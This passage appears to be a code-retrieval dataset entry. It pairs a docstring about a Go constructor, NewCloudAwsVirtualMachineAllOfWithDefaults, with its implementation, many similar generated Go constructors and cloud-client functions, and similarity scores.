string = \"LoginCredentials\"\n\tthis.BindMethod = &bindMethod\n\tvar nestedGroupSearchDepth int64 = 128\n\tthis.NestedGroupSearchDepth = &nestedGroupSearchDepth\n\tvar timeout int64 = 0\n\tthis.Timeout = &timeout\n\treturn &this\n}", "func NewVirtualizationBaseHostPciDeviceAllOf(classId string, objectType string) *VirtualizationBaseHostPciDeviceAllOf {\n\tthis := VirtualizationBaseHostPciDeviceAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamLdapConfigParamsAllOf(classId string, objectType string) *IamLdapConfigParamsAllOf {\n\tthis := IamLdapConfigParamsAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewComputeBladeIdentityAllOf(classId string, objectType string) *ComputeBladeIdentityAllOf {\n\tthis := ComputeBladeIdentityAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageNetAppCloudTargetAllOfWithDefaults() *StorageNetAppCloudTargetAllOf {\n\tthis := StorageNetAppCloudTargetAllOf{}\n\tvar classId string = \"storage.NetAppCloudTarget\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.NetAppCloudTarget\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamLdapProviderAllOf(classId string, objectType string) *IamLdapProviderAllOf {\n\tthis := IamLdapProviderAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar port int64 = 389\n\tthis.Port = &port\n\treturn &this\n}", "func NewAll(matchers []Matcher) All {\n\treturn All(matchers)\n}", "func NewStorageSpaceAllOfWithDefaults() *StorageSpaceAllOf {\n\tthis := StorageSpaceAllOf{}\n\tvar classId string = \"storage.Space\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.Space\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewUcsdBackupInfoAllOfWithDefaults() *UcsdBackupInfoAllOf {\n\tthis := UcsdBackupInfoAllOf{}\n\tvar classId string = \"ucsd.BackupInfo\"\n\tthis.ClassId = classId\n\tvar objectType string = \"ucsd.BackupInfo\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewEquipmentIdentityAllOfWithDefaults() *EquipmentIdentityAllOf {\n\tthis := EquipmentIdentityAllOf{}\n\tvar adminAction string = \"None\"\n\tthis.AdminAction = &adminAction\n\treturn &this\n}", "func NewStorageSpaceAllOf(classId string, objectType string) *StorageSpaceAllOf {\n\tthis := StorageSpaceAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewOsInstallAllOf(classId string, objectType string) *OsInstallAllOf {\n\tthis := OsInstallAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewHyperflexVmSnapshotInfoAllOf(classId string, objectType string) *HyperflexVmSnapshotInfoAllOf {\n\tthis := HyperflexVmSnapshotInfoAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageNetAppCloudTargetAllOf(classId string, objectType string) *StorageNetAppCloudTargetAllOf {\n\tthis := StorageNetAppCloudTargetAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func New(base mb.BaseMetricSet) (mb.MetricSet, error) {\n\n\tconfig := struct {\n\t\tKeys []string `config:\"keys\"`\n\t}{\n\t\tKeys: []string{},\n\t}\n\n\tif err := base.Module().UnpackConfig(&config); err != nil {\n\t\treturn nil, err\n\t}\n\n\tlogp.Warn(\"EXPERIMENTAL: The consulkv kv metricset is experimental %v\", config)\n\n\treturn &MetricSet{\n\t\tBaseMetricSet: base,\n\t\tkeys: config.Keys,\n\t}, nil\n}", "func NewQuotaSummaryAllOf(allowed int32, availabilityZoneType string, byoc bool, reserved int32, resourceName string, resourceType string) *QuotaSummaryAllOf {\n\tthis := QuotaSummaryAllOf{}\n\tthis.Allowed = allowed\n\tthis.AvailabilityZoneType = availabilityZoneType\n\tthis.Byoc = byoc\n\tthis.Reserved = reserved\n\tthis.ResourceName = resourceName\n\tthis.ResourceType = resourceType\n\treturn &this\n}", "func NewPcloudCloudinstancesVolumesGetallParams() *PcloudCloudinstancesVolumesGetallParams {\n\treturn &PcloudCloudinstancesVolumesGetallParams{\n\t\ttimeout: cr.DefaultTimeout,\n\t}\n}", "func NewWorkflowCliCommandAllOf(classId string, objectType string) *WorkflowCliCommandAllOf {\n\tthis := WorkflowCliCommandAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar type_ string = \"NonInteractive\"\n\tthis.Type = &type_\n\treturn &this\n}", "func NewIamLdapBasePropertiesAllOfWithDefaults() *IamLdapBasePropertiesAllOf {\n\tthis := IamLdapBasePropertiesAllOf{}\n\tvar classId string = \"iam.LdapBaseProperties\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.LdapBaseProperties\"\n\tthis.ObjectType = objectType\n\tvar bindMethod string = \"LoginCredentials\"\n\tthis.BindMethod = &bindMethod\n\tvar nestedGroupSearchDepth int64 = 128\n\tthis.NestedGroupSearchDepth = &nestedGroupSearchDepth\n\tvar timeout int64 = 0\n\tthis.Timeout = &timeout\n\treturn &this\n}", "func NewEquipmentIdentityAllOf(classId string, objectType string) *EquipmentIdentityAllOf {\n\tthis := EquipmentIdentityAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar adminAction string = \"None\"\n\tthis.AdminAction = &adminAction\n\treturn &this\n}", "func New() (*BFVM, error) {\n\treturn WithSpecs(8, 3000)\n}", "func NewSoftwarerepositoryLocalMachineAllOfWithDefaults() *SoftwarerepositoryLocalMachineAllOf {\n\tthis := SoftwarerepositoryLocalMachineAllOf{}\n\tvar classId string = \"softwarerepository.LocalMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"softwarerepository.LocalMachine\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (x *fastReflection_Params) New() protoreflect.Message {\n\treturn new(fastReflection_Params)\n}", "func newClient(auth azure.Authorizer) *azureClient {\n\treturn &azureClient{\n\t\tscalesetvms: newVirtualMachineScaleSetVMsClient(auth.SubscriptionID(), auth.BaseURI(), auth.Authorizer()),\n\t}\n}", "func NewOsInstallAllOfWithDefaults() *OsInstallAllOf {\n\tthis := OsInstallAllOf{}\n\tvar classId string = \"os.Install\"\n\tthis.ClassId = classId\n\tvar objectType string = \"os.Install\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func newCollectOptions() *common.CollectOptions {\n\topts := &common.CollectOptions{}\n\n\topts.Config = common.EdgecoreConfigPath\n\topts.OutputPath = \".\"\n\topts.Detail = false\n\treturn opts\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) WithContext(ctx context.Context) *PcloudCloudinstancesVolumesGetallParams {\n\to.SetContext(ctx)\n\treturn o\n}", "func NewUcsdBackupInfoAllOf(classId string, objectType string) *UcsdBackupInfoAllOf {\n\tthis := UcsdBackupInfoAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) WriteToRequest(r runtime.ClientRequest, reg strfmt.Registry) error {\n\n\tif err := r.SetTimeout(o.timeout); err != nil {\n\t\treturn err\n\t}\n\tvar res []error\n\n\tif o.Affinity != nil {\n\n\t\t// query param affinity\n\t\tvar qrAffinity string\n\n\t\tif o.Affinity != nil {\n\t\t\tqrAffinity = *o.Affinity\n\t\t}\n\t\tqAffinity := qrAffinity\n\t\tif qAffinity != \"\" {\n\n\t\t\tif err := r.SetQueryParam(\"affinity\", qAffinity); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\tif o.Auxiliary != nil {\n\n\t\t// query param auxiliary\n\t\tvar qrAuxiliary bool\n\n\t\tif o.Auxiliary != nil {\n\t\t\tqrAuxiliary = *o.Auxiliary\n\t\t}\n\t\tqAuxiliary := swag.FormatBool(qrAuxiliary)\n\t\tif qAuxiliary != \"\" {\n\n\t\t\tif err := r.SetQueryParam(\"auxiliary\", qAuxiliary); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// path param cloud_instance_id\n\tif err := r.SetPathParam(\"cloud_instance_id\", o.CloudInstanceID); err != nil {\n\t\treturn err\n\t}\n\n\tif o.ReplicationEnabled != nil {\n\n\t\t// query param replicationEnabled\n\t\tvar qrReplicationEnabled bool\n\n\t\tif o.ReplicationEnabled != nil {\n\t\t\tqrReplicationEnabled = *o.ReplicationEnabled\n\t\t}\n\t\tqReplicationEnabled := swag.FormatBool(qrReplicationEnabled)\n\t\tif qReplicationEnabled != \"\" {\n\n\t\t\tif err := r.SetQueryParam(\"replicationEnabled\", qReplicationEnabled); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func NewIamLdapProviderAllOfWithDefaults() *IamLdapProviderAllOf {\n\tthis := IamLdapProviderAllOf{}\n\tvar classId string = \"iam.LdapProvider\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.LdapProvider\"\n\tthis.ObjectType = objectType\n\tvar port int64 = 389\n\tthis.Port = &port\n\treturn &this\n}", "func NewMemoryArrayAllOfWithDefaults() *MemoryArrayAllOf {\n\tthis := MemoryArrayAllOf{}\n\tvar classId string = \"memory.Array\"\n\tthis.ClassId = classId\n\tvar objectType string = \"memory.Array\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewPcloudCloudinstancesVolumesGetallParamsWithHTTPClient(client *http.Client) *PcloudCloudinstancesVolumesGetallParams {\n\treturn &PcloudCloudinstancesVolumesGetallParams{\n\t\tHTTPClient: client,\n\t}\n}", "func NewMetricsAllOf() *MetricsAllOf {\n\tthis := MetricsAllOf{}\n\treturn &this\n}", "func NewPcloudCloudinstancesVolumesGetallParamsWithTimeout(timeout time.Duration) *PcloudCloudinstancesVolumesGetallParams {\n\treturn &PcloudCloudinstancesVolumesGetallParams{\n\t\ttimeout: timeout,\n\t}\n}", "func NewVirtualMachine(ctx *pulumi.Context,\n\tname string, args *VirtualMachineArgs, opts ...pulumi.ResourceOption) (*VirtualMachine, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.LabName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'LabName'\")\n\t}\n\tif args.ResourceGroupName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ResourceGroupName'\")\n\t}\n\tif args.AllowClaim == nil {\n\t\targs.AllowClaim = pulumi.BoolPtr(false)\n\t}\n\tif args.DisallowPublicIpAddress == nil {\n\t\targs.DisallowPublicIpAddress = pulumi.BoolPtr(false)\n\t}\n\tif args.OwnerObjectId == nil {\n\t\targs.OwnerObjectId = pulumi.StringPtr(\"dynamicValue\")\n\t}\n\tif args.StorageType == nil {\n\t\targs.StorageType = pulumi.StringPtr(\"labStorageType\")\n\t}\n\taliases := pulumi.Aliases([]pulumi.Alias{\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:devtestlab/v20180915:VirtualMachine\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-native:devtestlab:VirtualMachine\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:devtestlab:VirtualMachine\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-native:devtestlab/v20150521preview:VirtualMachine\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:devtestlab/v20150521preview:VirtualMachine\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-native:devtestlab/v20160515:VirtualMachine\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:devtestlab/v20160515:VirtualMachine\"),\n\t\t},\n\t})\n\topts = append(opts, aliases)\n\tvar resource VirtualMachine\n\terr := ctx.RegisterResource(\"azure-native:devtestlab/v20180915:VirtualMachine\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewStoragePhysicalDiskAllOfWithDefaults() *StoragePhysicalDiskAllOf {\n\tthis := StoragePhysicalDiskAllOf{}\n\tvar classId string = \"storage.PhysicalDisk\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.PhysicalDisk\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewPipelineSshKeyPairAllOfWithDefaults() *PipelineSshKeyPairAllOf {\n\tthis := PipelineSshKeyPairAllOf{}\n\treturn &this\n}", "func NewWorkflowCliCommandAllOfWithDefaults() *WorkflowCliCommandAllOf {\n\tthis := WorkflowCliCommandAllOf{}\n\tvar classId string = \"workflow.CliCommand\"\n\tthis.ClassId = classId\n\tvar objectType string = \"workflow.CliCommand\"\n\tthis.ObjectType = objectType\n\tvar type_ string = \"NonInteractive\"\n\tthis.Type = &type_\n\treturn &this\n}", "func newPVCs(cr *influxdatav1alpha1.Influxdb) *corev1.PersistentVolumeClaim {\n\tls := labelsForInfluxdb(cr.Name)\n\n\treturn &corev1.PersistentVolumeClaim{\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tAPIVersion: \"v1\",\n\t\t\tKind: \"PersistentVolumeClaim\",\n\t\t},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Spec.Pod.PersistentVolumeClaim.Name,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tLabels: ls,\n\t\t},\n\t\tSpec: cr.Spec.Pod.PersistentVolumeClaim.Spec,\n\t}\n}", "func NewStoragePhysicalDiskAllOf(classId string, objectType string) *StoragePhysicalDiskAllOf {\n\tthis := StoragePhysicalDiskAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewAllTimezonesBadRequest() *AllTimezonesBadRequest {\n return &AllTimezonesBadRequest{\n }\n}", "func NewConnectorTypeAllOfWithDefaults() *ConnectorTypeAllOf {\n\tthis := ConnectorTypeAllOf{}\n\n\n\n\n\n\n\n\n\treturn &this\n}", "func NewHyperflexMapClusterIdToProtectionInfoAllOfWithDefaults() *HyperflexMapClusterIdToProtectionInfoAllOf {\n\tthis := HyperflexMapClusterIdToProtectionInfoAllOf{}\n\tvar classId string = \"hyperflex.MapClusterIdToProtectionInfo\"\n\tthis.ClassId = classId\n\tvar objectType string = \"hyperflex.MapClusterIdToProtectionInfo\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewStorageHitachiPortAllOfWithDefaults() *StorageHitachiPortAllOf {\n\tthis := StorageHitachiPortAllOf{}\n\tvar classId string = \"storage.HitachiPort\"\n\tthis.ClassId = classId\n\tvar objectType string = \"storage.HitachiPort\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewMetricsAllOfWithDefaults() *MetricsAllOf {\n\tthis := MetricsAllOf{}\n\treturn &this\n}", "func NewMemoryArrayAllOf(classId string, objectType string) *MemoryArrayAllOf {\n\tthis := MemoryArrayAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewWorkflowServiceItemDefinitionAllOfWithDefaults() *WorkflowServiceItemDefinitionAllOf {\n\tthis := WorkflowServiceItemDefinitionAllOf{}\n\tvar classId string = \"workflow.ServiceItemDefinition\"\n\tthis.ClassId = classId\n\tvar objectType string = \"workflow.ServiceItemDefinition\"\n\tthis.ObjectType = objectType\n\tvar allowMultipleServiceItemInstances bool = true\n\tthis.AllowMultipleServiceItemInstances = &allowMultipleServiceItemInstances\n\tvar deleteInstanceOnDecommission bool = false\n\tthis.DeleteInstanceOnDecommission = &deleteInstanceOnDecommission\n\tvar publishStatus string = \"NotPublished\"\n\tthis.PublishStatus = &publishStatus\n\tvar supportStatus string = \"Supported\"\n\tthis.SupportStatus = &supportStatus\n\tvar version int64 = 1\n\tthis.Version = &version\n\treturn &this\n}", "func New(tagName ...string) *VM {\n\tif len(tagName) == 0 {\n\t\ttagName = append(tagName, \"\")\n\t}\n\treturn &VM{\n\t\ttagName: tagName[0],\n\t\tstructJar: make(map[int32]*structVM, 256),\n\t}\n}", "func NewStackpathRpcLocalizedMessageAllOfWithDefaults() *StackpathRpcLocalizedMessageAllOf {\n\tthis := StackpathRpcLocalizedMessageAllOf{}\n\treturn &this\n}", "func NewCloud(cfg CloudConfig, metricsRegisterer prometheus.Registerer) (Cloud, error) {\n\tmetadataSess := session.Must(session.NewSession(aws.NewConfig()))\n\tmetadata := services.NewEC2Metadata(metadataSess)\n\tif len(cfg.Region) == 0 {\n\t\tregion, err := metadata.Region()\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"failed to introspect region from EC2Metadata, specify --aws-region instead if EC2Metadata is unavailable\")\n\t\t}\n\t\tcfg.Region = region\n\t}\n\n\tif len(cfg.VpcID) == 0 {\n\t\tvpcId, err := metadata.VpcID()\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"failed to introspect vpcID from EC2Metadata, specify --aws-vpc-id instead if EC2Metadata is unavailable\")\n\t\t}\n\t\tcfg.VpcID = vpcId\n\t}\n\n\tawsCFG := aws.NewConfig().WithRegion(cfg.Region).WithSTSRegionalEndpoint(endpoints.RegionalSTSEndpoint).WithMaxRetries(cfg.MaxRetries)\n\tsess := session.Must(session.NewSession(awsCFG))\n\tinjectUserAgent(&sess.Handlers)\n\n\tif cfg.ThrottleConfig != nil {\n\t\tthrottler := throttle.NewThrottler(cfg.ThrottleConfig)\n\t\tthrottler.InjectHandlers(&sess.Handlers)\n\t}\n\tif metricsRegisterer != nil {\n\t\tmetricsCollector, err := metrics.NewCollector(metricsRegisterer)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrapf(err, \"failed to initialize sdk metrics collector\")\n\t\t}\n\t\tmetricsCollector.InjectHandlers(&sess.Handlers)\n\t}\n\n\treturn &defaultCloud{\n\t\tcfg: cfg,\n\t\tec2: services.NewEC2(sess),\n\t\telbv2: services.NewELBV2(sess),\n\t\tacm: services.NewACM(sess),\n\t\twafv2: services.NewWAFv2(sess),\n\t\twafRegional: services.NewWAFRegional(sess, cfg.Region),\n\t\tshield: services.NewShield(sess),\n\t\trgt: services.NewRGT(sess),\n\t}, nil\n}", "func NewNiatelemetryEqptcapacityPolUsage5minAllOf(classId string, objectType string) *NiatelemetryEqptcapacityPolUsage5minAllOf {\n\tthis := NiatelemetryEqptcapacityPolUsage5minAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewInfraBasePciConfigurationAllOfWithDefaults() *InfraBasePciConfigurationAllOf {\n\tthis := InfraBasePciConfigurationAllOf{}\n\treturn &this\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) WithDefaults() *PcloudCloudinstancesVolumesGetallParams {\n\to.SetDefaults()\n\treturn o\n}", "func NewConnectorTypeAllOfWithDefaults() *ConnectorTypeAllOf {\n\tthis := ConnectorTypeAllOf{}\n\treturn &this\n}", "func initializeVM(jobName string, args []types.JobArgs) *otto.Otto {\n\tcontext := &types.JobInstanceContext{\n\t\tJobName: jobName,\n\t}\n\tvm := NewVMWithPlugins(context)\n\t// Setting job arguments in VM\n\tfor _, arg := range args {\n\t\tvm.Set(arg.Name, arg.Value)\n\t}\n\treturn vm\n}", "func New(opts ...Option) *Vox {\n\tv := &Vox{\n\t\tcb: nil,\n\t\tholdTime: time.Millisecond * 500,\n\t\tthreshold: 0.1,\n\t\tlastActivation: time.Time{},\n\t}\n\n\tfor _, opt := range opts {\n\t\topt(v)\n\t}\n\n\treturn v\n}", "func NewConnectorXmlApiMessageAllOfWithDefaults() *ConnectorXmlApiMessageAllOf {\n\tthis := ConnectorXmlApiMessageAllOf{}\n\tvar classId string = \"connector.XmlApiMessage\"\n\tthis.ClassId = classId\n\tvar objectType string = \"connector.XmlApiMessage\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewIamLdapConfigParamsAllOfWithDefaults() *IamLdapConfigParamsAllOf {\n\tthis := IamLdapConfigParamsAllOf{}\n\tvar classId string = \"iam.LdapConfigParams\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.LdapConfigParams\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (x *fastReflection_AddressBytesToStringRequest) New() protoreflect.Message {\n\treturn new(fastReflection_AddressBytesToStringRequest)\n}", "func NewTimedZoneRangeAllOf() *TimedZoneRangeAllOf {\n\tthis := TimedZoneRangeAllOf{}\n\treturn &this\n}", "func newVMClient(s storage.Storage) VMClient {\n\treturn &vmClient{\n\t\tstorage: s,\n\t\tfilterer: filterer.NewFilterer(s),\n\t}\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) WithTimeout(timeout time.Duration) *PcloudCloudinstancesVolumesGetallParams {\n\to.SetTimeout(timeout)\n\treturn o\n}", "func create_virtual_machine(){\n parameters := make([]string, 0)\n parameters = append(parameters, \"apply\")\n parameters = append(parameters, \"--auto-approve\")\n\n execute_command(\"terraform\", parameters)\n}", "func NewOpenapiProcessFileAllOfWithDefaults() *OpenapiProcessFileAllOf {\n\tthis := OpenapiProcessFileAllOf{}\n\tvar classId string = \"openapi.ProcessFile\"\n\tthis.ClassId = classId\n\tvar objectType string = \"openapi.ProcessFile\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func New(base mb.BaseMetricSet) (mb.MetricSet, error) {\n\tcfgwarn.Beta(\"The vsphere host metricset is beta\")\n\n\tconfig := struct {\n\t\tUsername string `config:\"username\"`\n\t\tPassword string `config:\"password\"`\n\t\tInsecure bool `config:\"insecure\"`\n\t}{}\n\n\tif err := base.Module().UnpackConfig(&config); err != nil {\n\t\treturn nil, err\n\t}\n\n\tu, err := url.Parse(base.HostData().URI)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tu.User = url.UserPassword(config.Username, config.Password)\n\n\treturn &MetricSet{\n\t\tBaseMetricSet: base,\n\t\tHostURL: u,\n\t\tInsecure: config.Insecure,\n\t}, nil\n}", "func (bv *BaseVSphere) Initialize() error {\n\tbv.ctx, bv.cancel = context.WithCancel(context.Background())\n\n\t// Connect and login to the VMWare vSphere API endpoint\n\tc, err := govmomi.NewClient(bv.ctx, bv.url, bv.Insecure)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbv.client = c\n\tbv.finder = find.NewFinder(bv.client.Client, true)\n\n\treturn nil\n}", "func NewPolicyPaginationAllOf(data []PolicyExtended, ) *PolicyPaginationAllOf {\n\tthis := PolicyPaginationAllOf{}\n\tthis.Data = data\n\treturn &this\n}", "func NewTimedZoneRangeAllOfWithDefaults() *TimedZoneRangeAllOf {\n\tthis := TimedZoneRangeAllOf{}\n\treturn &this\n}", "func NewApplianceSetupInfoAllOfWithDefaults() *ApplianceSetupInfoAllOf {\n\tthis := ApplianceSetupInfoAllOf{}\n\tvar classId string = \"appliance.SetupInfo\"\n\tthis.ClassId = classId\n\tvar objectType string = \"appliance.SetupInfo\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewWorkflowServiceItemDefinitionAllOf(classId string, objectType string) *WorkflowServiceItemDefinitionAllOf {\n\tthis := WorkflowServiceItemDefinitionAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\tvar allowMultipleServiceItemInstances bool = true\n\tthis.AllowMultipleServiceItemInstances = &allowMultipleServiceItemInstances\n\tvar deleteInstanceOnDecommission bool = false\n\tthis.DeleteInstanceOnDecommission = &deleteInstanceOnDecommission\n\tvar publishStatus string = \"NotPublished\"\n\tthis.PublishStatus = &publishStatus\n\tvar supportStatus string = \"Supported\"\n\tthis.SupportStatus = &supportStatus\n\tvar version int64 = 1\n\tthis.Version = &version\n\treturn &this\n}", "func (x *fastReflection_AddressStringToBytesRequest) New() protoreflect.Message {\n\treturn new(fastReflection_AddressStringToBytesRequest)\n}", "func NewStorageHitachiPortAllOf(classId string, objectType string) *StorageHitachiPortAllOf {\n\tthis := StorageHitachiPortAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewFindAllOptions(flavor Flavor) *FindAllOptions {\n\treturn &FindAllOptions{\n\t\tFields: []string{\"*\"},\n\t\tFlavor: flavor,\n\t\tFilters: make(map[string]interface{}),\n\t}\n}", "func (f *IBMPIInstanceClient) GetAll(powerinstanceid string, timeout time.Duration) (*models.PVMInstances, error) {\n\n\tparams := p_cloud_p_vm_instances.NewPcloudPvminstancesGetallParamsWithTimeout(getTimeOut).WithCloudInstanceID(powerinstanceid)\n\tresp, err := f.session.Power.PCloudPVMInstances.PcloudPvminstancesGetall(params, ibmpisession.NewAuth(f.session, powerinstanceid))\n\tif err != nil || resp.Payload == nil {\n\t\treturn nil, fmt.Errorf(\"Failed to Get all PVM Instances of Power Instance %s :%s\", powerinstanceid, err)\n\t}\n\treturn resp.Payload, nil\n}" ]
[ "0.75913084", "0.64905167", "0.6456979", "0.6426578", "0.641052", "0.63549984", "0.62398493", "0.6167122", "0.6133941", "0.5522241", "0.549942", "0.5448296", "0.53074896", "0.52958477", "0.5290606", "0.52563024", "0.5180518", "0.51742876", "0.5128644", "0.5117864", "0.510673", "0.509425", "0.50827104", "0.5076811", "0.5055654", "0.4999507", "0.49977916", "0.49851614", "0.49808365", "0.497334", "0.4969254", "0.4964504", "0.49568272", "0.4949294", "0.49192187", "0.49114922", "0.49066794", "0.48761246", "0.48758373", "0.48697183", "0.48644373", "0.48500043", "0.4844401", "0.48366416", "0.48180902", "0.48135138", "0.4806336", "0.47935474", "0.47856465", "0.47789946", "0.4776731", "0.47644722", "0.47406453", "0.47388723", "0.47191614", "0.47128844", "0.46997088", "0.46726763", "0.46635237", "0.4649437", "0.46413547", "0.46350002", "0.4634414", "0.46321708", "0.46268862", "0.46252784", "0.46150917", "0.45935443", "0.45932484", "0.4590036", "0.45877603", "0.45702833", "0.45648926", "0.45648235", "0.45623836", "0.4548893", "0.45479327", "0.45476413", "0.45401722", "0.4533012", "0.45314932", "0.45196238", "0.45121816", "0.45051017", "0.45043662", "0.45016152", "0.44907615", "0.44826293", "0.44817963", "0.44754088", "0.44730136", "0.4463281", "0.44554797", "0.44510648", "0.44425306", "0.44379646", "0.44353864", "0.44312787", "0.44310156", "0.44306105" ]
0.79741985
0
NewCloudAwsVirtualMachineAllOfWithDefaults instantiates a new CloudAwsVirtualMachineAllOf object This constructor will only assign default values to properties that have it defined, but it doesn't guarantee that properties required by API are set
func NewCloudAwsVirtualMachineAllOfWithDefaults() *CloudAwsVirtualMachineAllOf { this := CloudAwsVirtualMachineAllOf{} var classId string = "cloud.AwsVirtualMachine" this.ClassId = classId var objectType string = "cloud.AwsVirtualMachine" this.ObjectType = objectType return &this }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewHyperflexVirtualMachineAllOfWithDefaults() *HyperflexVirtualMachineAllOf {\n\tthis := HyperflexVirtualMachineAllOf{}\n\tvar classId string = \"hyperflex.VirtualMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"hyperflex.VirtualMachine\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationVmwareVirtualMachineAllOfWithDefaults() *VirtualizationVmwareVirtualMachineAllOf {\n\tthis := VirtualizationVmwareVirtualMachineAllOf{}\n\tvar classId string = \"virtualization.VmwareVirtualMachine\"\n\tthis.ClassId = classId\n\tvar objectType string = \"virtualization.VmwareVirtualMachine\"\n\tthis.ObjectType = objectType\n\tvar guestState string = \"Unknown\"\n\tthis.GuestState = &guestState\n\treturn &this\n}", "func NewCloudInstanceTypeAllOfWithDefaults() *CloudInstanceTypeAllOf {\n\tthis := CloudInstanceTypeAllOf{}\n\tvar classId string = \"cloud.InstanceType\"\n\tthis.ClassId = classId\n\tvar objectType string = \"cloud.InstanceType\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewCloudAwsVirtualMachineAllOf(classId string, objectType string) *CloudAwsVirtualMachineAllOf {\n\tthis := CloudAwsVirtualMachineAllOf{}\n\tthis.ClassId = classId\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func (o *PcloudCloudinstancesVolumesGetallParams) SetDefaults() {\n\t// no default values defined for this parameter\n}", "func NewIamServiceProviderAllOfWithDefaults() *IamServiceProviderAllOf {\n\tthis := IamServiceProviderAllOf{}\n\tvar classId string = \"iam.ServiceProvider\"\n\tthis.ClassId = classId\n\tvar objectType string = \"iam.ServiceProvider\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationIweClusterAllOfWithDefaults() *VirtualizationIweClusterAllOf {\n\tthis := VirtualizationIweClusterAllOf{}\n\tvar classId string = \"virtualization.IweCluster\"\n\tthis.ClassId = classId\n\tvar objectType string = \"virtualization.IweCluster\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewComputeBladeIdentityAllOfWithDefaults() *ComputeBladeIdentityAllOf {\n\tthis := ComputeBladeIdentityAllOf{}\n\tvar classId string = \"compute.BladeIdentity\"\n\tthis.ClassId = classId\n\tvar objectType string = \"compute.BladeIdentity\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewHyperflexVmSnapshotInfoAllOfWithDefaults() *HyperflexVmSnapshotInfoAllOf {\n\tthis := HyperflexVmSnapshotInfoAllOf{}\n\tvar classId string = \"hyperflex.VmSnapshotInfo\"\n\tthis.ClassId = classId\n\tvar objectType string = \"hyperflex.VmSnapshotInfo\"\n\tthis.ObjectType = objectType\n\treturn &this\n}", "func NewVirtualizationBaseHostPciDeviceAllOfWithDefaults() *VirtualizationBaseHostPciDeviceAllOf 